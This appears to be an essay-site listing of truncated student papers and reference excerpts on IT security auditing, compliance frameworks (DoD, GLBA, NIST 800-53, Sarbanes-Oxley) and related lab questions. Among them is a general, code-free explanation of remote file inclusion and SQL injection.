...and combine them into one final report. These reports will consist of: - The two auditing frameworks or hardening guidelines / security checklists used by the DoD. - How a security assessment addressing modern day risks, threats, and vulnerabilities throughout the 7-domains of a typical IT infrastructure can help an organization achieve compliance. - How to gather and obtain needed information to perform a GLBA Financial Privacy & Safeguards Rules compliance audit and what must be covered. - The top workstation domain risks, threats, and vulnerabilities which will not only include possible causes, but mitigations as to prevent these issues from happening. - The top LAN – to – WAN risks, threats, and vulnerabilities which will not only include possible causes, but mitigations as to how we can prevent these issues from happening. - The top Remote Access Domain risks, threats, and vulnerabilities as well as ways to mitigate these types of issues. - The top Systems / Application Domain risks, threats, and vulnerabilities as well as ways to mitigate these types of issues. Part 1: Purpose: The purpose of part 1 for this lab is to develop an executive summary in regards to either the two auditing frameworks or hardening guidelines/security checklists used by the DoD. For this, I have chosen to discuss the two auditing frameworks. Background: A little background about the AF (Auditing Framework) for the DoD is that it provides a foundation for developing and representing...
Words: 2140 - Pages: 9
...Student Lab Manual © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett Learning, LL NOT FOR SALE OR DISTRIBUT © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION Student Lab Manual © Jones & Bartlett Learning, LLC © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett Learning, LL NOT FOR SALE OR DISTRIBUT Auditing IT Infrastructures for Compliance © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION IS4680 © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett Learning, LL NOT FOR SALE OR DISTRIBUT © Jones & Bartlett Learning, LLC NOT FOR SALE OR DISTRIBUTION © Jones & Bartlett©Learning, LLC Learning, LLC, an Ascend Learning Company Bartlett Current Version Date: 11/21/2011 © Jones & Learning, LLC Copyright 2013 by Jones & Bartlett www.jblearning.com! NOT FOR SALE OR DISTRIBUTION ...
Words: 30948 - Pages: 124
...Reviewers: Darmadi Komo, Jack Richins, Devendra Tiwari Published: January 2012 Applies to: SQL Server 2012 and SQL Server 2014 Summary: Security is a crucial part of any mission-critical application. This paper describes best practices for setting up and maintaining security in SQL Server 2012. Copyright The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information presented after the date of publication. This white paper is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED, OR STATUTORY, AS TO THE INFORMATION IN THIS DOCUMENT. Complying with all applicable copyright laws is the responsibility of the user. Without limiting the rights under copyright, no part of this document may be reproduced, stored in, or introduced into a retrieval system, or transmitted in any form or by any means (electronic, mechanical, photocopying, recording, or otherwise), or for any purpose, without the express written permission of Microsoft Corporation. Microsoft may have patents, patent applications, trademarks, copyrights, or other intellectual property rights covering subject matter in this document. Except as expressly provided in any written license agreement from Microsoft, the...
Words: 15647 - Pages: 63
...1. What is a PHP Remote File Include (RFI) attack, and why are these prevalent in today's Internet world? RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. This vulnerability exploits the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). RFI is a common vulnerability and all website hacking is not entirely focused on SQL injection. Using RFI you can deface the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one. 2. What country is the top host of SQL Injection and SQL Slammer infections? Why can't the US Government do anything to prevent these injection attacks and infections? The U.S. is the top host of SQL Injection and SQL Slammer infections. Cybercriminals have made vast improvements to their infrastructure over the last few years. Its expansion is thousands of websites vulnerable to SQL Injections. Malicious code writers have exploited these vulnerabilities to distribute malware so quick that the government cannot contain such a large quantity. 3. What does it mean to have a policy of Nondisclosure in an organization? It is a contract where the parties agree not to disclose information covered by the agreement. It outlines confidential material...
Words: 1109 - Pages: 5
...QUALYSGUARD® ROLLOUT GUIDE July 12, 2012 Copyright 2011-2012 by Qualys, Inc. All Rights Reserved. Qualys, the Qualys logo and QualysGuard are registered trademarks of Qualys, Inc. All other trademarks are the property of their respective owners. Qualys, Inc. 1600 Bridge Parkway Redwood Shores, CA 94065 1 (650) 801 6100 Preface Chapter 1 Introduction Operationalizing Security and Policy Compliance..................................................... 10 QualysGuard Best Practices ........................................................................................... 11 Chapter 2 Rollout First Steps First Login......................................................................................................................... Complete the User Registration.......................................................................... Your Home Page................................................................................................... View Host Assets .................................................................................................. Add Hosts .............................................................................................................. Remove IPs from the Subscription..................................................................... Add Virtual Hosts ................................................................................................ Check Network Access to Scanners .....................................
Words: 38236 - Pages: 153
...in turn ensure they meet the specific purposes of why they have been developed for. Core Competencies • Well experienced in Assurance Domain & Banking Domain (Mortgage banking) with the recent project being testing of Performance and Attribution Reporting of JPMorgan Chase Client using BI-SAM BONE Application. • Exposure to wide Business Domain in Auditing, Tax and advisory services for US and Mortgage banking. • Effective team leader and an efficient individual workforce; successfully lead and delivered two projects on time with the 4 member team. • Worked for Wells Fargo as a QA testing Team member testing Image and content Management Platform project. • Web application Testing, Stand alone application and Regression testing. • Experienced in Functional, non-functional and System testing. • Have hands on experience on database and web services testing. • Extensive Experience in using Quality Center & ALM – (used as Test Management tool for tracking and reporting the Requirement Traceability, Test Preparation, Test Execution and Defect Management). • Preparing Test plans, test data, traceability matrix and execution of test scripts. • Obtained ISTQB foundation level certificate ACHIVEMENTS • Obtained TCS certificate as outstanding resource for the contribution made to “connected Work Paper” application. • Obtained appreciation from the team manager for working more actively, Delivering the deliverables within...
Words: 1542 - Pages: 7
... Mapping Business Control with IT Application: An IS Auditor can help ensure that necessary business controls can be mapped into the application control. He/She can ascertain that the Business controls are put in the developmental stage itself, if employed at the project stage. Business Process Re-engineering: There is a difference in automation and computerisation, in the former the existing manual process is automated using computers and in the latter the existing process. In the latter absorption is more effectively achieved but can pose serious problems if some forms of basic controls are omitted. An IS Auditor being a part of this exercise to ensure that the basic controls required for business exist in the re-engineered process. The IT Security Policy: The IS Auditor due to extensive engagement with the organisation is able to say which parts of the policy are being complied with and can also offer suggestions on improving compliance and making suitable changes to the IT Policy. He can also offer guidance in those areas which may not be adequately addressed in the policy. Security Awareness: An effective IS Audit helps increase level of security awareness and compliance with security measures among IT users. This also provides motivation to security officers and system administrators to do their job effectively. Better Return on Investment: IS audits are not only considered for security nowadays but also performance management and value for IT investments...
Words: 477 - Pages: 2
...Executive Summary The need for auditors with technology skills have increased, this is why the IT auditing profession has become very important. Information Technology auditors analyze the information technology structure, operations, and software of an organization. They are in charge of identifying better ways in which the organization’s systems can meet their needs in a better and more reliable way. IT auditors can basically design new systems by configuring hardware and software programs and they also test the systems to make sure they are working properly. Most IT auditors work in offices, obviously with computer systems. Some IT auditors work with the same company for years making sure the information systems and internal controls work properly. Some other IT auditors work for CPA firms that provide auditing services, and are required to travel to evaluate the information systems of clients. For the most part IT auditors work independently, but when they are assigned to larger and/or complicated projects, they use the collaboration of other peers. James Reinhard, CPA, CIA, CISA, manager of Simon Property Group Inc. who has more than 20 years’ experience in IT and integrated auditing states that “The ideal IT auditor should be able to discuss IP routing with the network folks in one hour and financial statement disclosures with the controller in the next” (Scharf, 2008). To become the ideal IT auditor IT audit certifications are the best option. IT audit...
Words: 5614 - Pages: 23
...[pic] Information Security Office Information Security Office Security Assessment Description and Questionnaire The Information Security Office offers many types of assessments to meet our customer’s needs. This document explains the process for requesting an assessment, describes the set of security assessment services that the Information Security Office (ISO) offers to members of the campus community and provides a questionnaire that is used to assist in understanding the target environment. The ISO is not able to assess every possible platform or application. Nor is it possible for the ISO to meet every timeline requirement. In those cases, the ISO may contract with external partners to deliver the requested assessment service. There may be associated costs that will need to be passed along to the requesting organizational unit. Process: The Information Security Office has created a simple process around vulnerability assessments to provide clarity and consistency. The process is outlined and diagrammed below. 1. Contact the ISO (request assessment) 2. The ISO accepts the project 3. A questionnaire (later in this document) is completed by the customer 4. A scoping/kick-off meeting is held • The goal of the meeting is to try to determine which type of assessment is appropriate, the scope of the assessment, a timeline and contact information. The product of the meeting is a Statement of Work that will be agreed upon and...
Words: 1566 - Pages: 7
...Client Workstations- For client workstations domain we Dominique and Kendal plan to implement full 128 bit hard drive encryption on all users’ desktops, laptops, cellphones, tablets, and Company assigned bring your own devices (byod)’s. for all level 1 security users which includes; employees, contractors, vendors, department & managers, the will be a 90 day password expiration which at the end of 90 day forces the user to change their password and cannot recycle their passwords for 9 months. Each password has to be at least 24 characters with one capitol letter and have at least one symbol and one number in the password. For all level 2 workstations which include network administrators we are going to implement CAC CARDS OR COMMON ACCESS CARDS with a pin for main log in. There will be finger print access required to enter any level 2 security workstation or work are. In order to enter any level 2 work area there will be a required key card for entry. On to our level 3 client workstations include; senior administrators, junior administrators, & the co-ceo & the ceo. We plan on implementing a fingerprint scanner to boot the workstation, a 128 bit hard drive encrypted password to log on. In order to enter a level 3 workstation area users will be required to user a CAC magnetized card, a fingerprint, and must be cleared by 24hr surveillance to enter the level 3 workstations area. Server areas- For Richman investments each server room will have 24 hr...
Words: 751 - Pages: 4
...4 September 2004 Paper on “Formulation of IT Auditing Standards” By -- Ms.Puja S Mandol and Ms. Monika Verma Supreme Audit Institution of India Introduction The use of computers and computer based information systems have pervaded deep and wide in every modern day organization. An organization must exercise control over these computer based information systems because the cost of errors and irregularities that may arise in these systems can be high and can even challenge the very existence of the organization. An organizations ability to survive can be severely undermined through corruption or destruction of its database; decision making errors caused by poor-quality information systems; losses incurred through computer abuses; loss of computer assets and their control on how the computers are used within the organization. Therefore managements across the world have deployed specialized auditors to audit their information systems to find out gaps between declared policies and actual use and shortcomings in the information system design and usage. Information Systems Audit is the process of collecting and evaluating evidence to determine whether a computer system has been designed to maintain data integrity, safeguard assets, allows organizational goals to be achieved effectively and uses the resources efficiently. The IS Auditor should see that not only adequate internal controls exist in the system but they also wok effectively to ensure results...
Words: 6839 - Pages: 28
...Appendix C for the full list of references and Appendix A for a list of major security controls relevant for WLAN security). This publication does not eliminate the need to follow recommendations in other NIST publications, such as [SP800-48] and [SP800-97]. If there is a conflict between recommendations in this publication and another NIST wireless publication, the recommendation in this publication takes precedence. NIST Special Publication 800-53 is part of the Special Publication 800-series that reports on the Information Technology Laboratory’s (ITL) research, guidelines, and outreach efforts in information system security, and on ITL’s activity with industry, government, and academic organizations. Specifically, NIST Special Publication 800-53 covers the steps in the Risk Management Framework that address security control selection for federal information systems in accordance with the security requirements in Federal Information Processing Standard (FIPS) 200. This includes selecting an initial set of baseline security controls based on a FIPS 199 worst-case impact analysis, tailoring the baseline security controls, and supplementing the security controls based on an organizational assessment of risk. The security rules cover 17 areas including access control,...
Words: 1201 - Pages: 5
...standard, procedures, and guidelines to protect confidential data. * Adopting a data classification standard that defines how to treat data throughout AT. * Limiting access to systems and application that house confidential data to only those authorized to use it * Using cryptography techniques to hide confidential data to keep it invisible to unauthorized user * Encrypting data that crosses the public internet. * Encrypting data that is stored within databases and storage devices 4. Definition of policy, standard, guide, procedure * Policy: is written statement that the people in charge of an organization have set as a course of action or direction. Come from upper management-apply to whole organize * Standard: detail information for hardware and software, how it use-ensure consistent security controls are used throughout IT system * Procedure: instruction for how to use policies and standards: plan of action, install, test, auditing * Guidelines: suggest course of action for using the policy, standard or procedure. 5. Definition of classification of data * Goal and objective of DCS is to provide a consistent definition for how an organization should handle and secure different types of data: private data, confidential, internal use only, and public domain data. 6. Result of lapse in security...
Words: 963 - Pages: 4
...Daejeon, Korea 2 Dept of Information Communication, Sunchon Univerity, Sunchon, Korea 3 Fumate Inc., Daejeon, Korea rosslin_john@yahoo.com, secho@sunchon.ac.kr, yslee@fumate.com, taihoonn@empal.com Abstract The Sarbanes-Oxley (SOX) Act is a United States federal law enacted on July 30, 2002 in response to a number of major corporate and accounting scandals including those affecting Enron, Tyco International, Adelphia, Peregrine Systems and WorldCom. This paper discusses the effects of Sarbanes-Oxley (SOX) Act on corporate information security governance practices. The resultant regulatory intervention forces a company to revisit its internal control structures and asses the nature and scope of its compliance with the law. This paper reviews the implications emerging from the mandatory compliance with Sarbanes-Oxley (SOX) Act. Issues related to IT governance and the general integrity of the enterprise are also identified and discussed. Industry internal control assessment frameworks, such as COSO and COBIT, are reviewed and their usefulness in ensuring compliance evaluated. 1. Introduction Accounting scandals at some of the big corporations like Enron, HealthSouth, Tyco and WorldCom had a devastating impact on investor confidence. Clearly, it was possible to engage in frauds of such magnitude because of the inability of auditors to detect early signs of such possibilities. This paper reviews the impact of legal controls on Information Technology (IT) governance practices, especially...
Words: 3348 - Pages: 14
...Lab 6: Auditing the Workstation Domain for Compliance Question 1 – What are some common risks, threats, vulnerabilities commonly found in the Remote Access Domain that must be mitigated through a layered security strategy? a. Some common risks, threats, or vulnerabilities are company laptop stolen, software keyloggers being put on computers and having passwords and user accounts stolen, data leakage, and unauthorized access to the network. Question 2 – File-sharing utilities and client-to-client communication applications can provide the ability to share files with other users (i.e. Peer-to-Peer networking or Sharing). What risk and/or vulnerabilities are introduced with these applications? a. A lot of these are shared through clear text. If a user uses the same password for logging into one of these utilities as they do for their network login or any other data sensitive login the password can be easily compromised. Question 3 – Explain how confidentiality can be achieved within the Workstation Domain with security controls and security countermeasures. a. You can achieve this by using GPO’s and WMI filters. This will help push Workstation security policies to the computers such as if the computer is idle for more than 5 minutes it locks, or access to different parts of the computer like control panel are blocked. Question 4 – Explain how data integrity can be achieved within the Workstation Domain with security controls and security countermeasures. a. Security controls...
Words: 951 - Pages: 4